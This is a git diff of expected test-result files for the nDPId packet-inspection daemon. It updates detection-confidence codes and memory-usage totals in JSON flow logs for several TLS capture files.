00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-payload-len":41014,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1643611942615} 
00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-payload-len":70000,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1643612754900} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-payload-len":98963,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1643614758865} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":120,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1643610288722,"flow_last_seen":1643614758886,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":112952,"flow_avg_l4_payload_len":990,"midstream":1,"thread_ts_msec":1643614758886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":120,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1643610288722,"flow_last_seen":1643614758886,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":112952,"flow_avg_l4_payload_len":990,"midstream":1,"thread_ts_msec":1643614758886,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":120,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":120,"packets-processed":120,"total-skipped-flows":0,"total-l4-payload-len":113381,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1643614758886} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 120/120 @@ -26,9 +26,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5912858 bytes -~~ total memory freed........: 5912858 bytes -~~ total allocations/frees...: 118244/118244 +~~ total memory allocated....: 6046492 bytes +~~ total memory freed........: 6046492 bytes +~~ total allocations/frees...: 121006/121006 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2416 chars 
diff --git a/test/results/tls-esni-fuzzed.pcap.out b/test/results/tls-esni-fuzzed.pcap.out index e6bb181a8..2c096430b 100644 --- a/test/results/tls-esni-fuzzed.pcap.out +++ b/test/results/tls-esni-fuzzed.pcap.out 
@@ -2,13 +2,13 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} 
-00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtwjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuT
KEqAk5KVlL4AHAACQAE="} -01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879090 bytes -~~ total memory freed........: 5879090 bytes -~~ total allocations/frees...: 118136/118136 +~~ total memory allocated....: 6012724 bytes +~~ total memory freed........: 6012724 bytes +~~ total allocations/frees...: 120898/120898 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 1433 chars diff --git a/test/results/tls-rdn-extract.pcap.out b/test/results/tls-rdn-extract.pcap.out index 62bd4f36e..c34661f6f 100644 --- a/test/results/tls-rdn-extract.pcap.out +++ b/test/results/tls-rdn-extract.pcap.out 
@@ -2,12 +2,12 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00631{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAACnLudAAIAGnZoKAAAB1ceV+3ppAbtkZ4Ye79i2a1AYQCmgXgAAFgMBAHoBAAB2AwEAAAAAM7RDB2u\/HXE+9PsbFMYgy+4A2s6CH4THeQytZwAAGAAvADUABQAKwBPAFMAJwAoAMgA4ABMABAEAADX\/AQABAAAAABMAEQAADmFkczEubXNhZHMubmV0AAUABQEAAAAAAAoABgAEABcAGAALAAIBAA=="} 
-00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946681200000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PJAADUGLVrVx5X7CgAAAQG7emnv2LZrZGeGnVAQGJhAQwAAFgMBAEoCAABGAwEAAAAAWuuHTEcV+akd0cdt\/mCIl2W0D3ZsYen8qlKhhyDexkYNJNvmICdLfXfmBpGxedPIi6ruP\/C4V2lgLy7HPwAvABYDARoFCwAaAQAZ\/gAOyDCCDsQwgg2soAMCAQICCmkXyLYACAACTA8wDQYJKoZIhvcNAQEFBQAwgYsxEzARBgoJkiaJk\/IsZAEZFgNjb20xGTAXBgoJkiaJk\/IsZAEZFgltaWNyb3NvZnQxFDASBgoJkiaJk\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"} -01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 
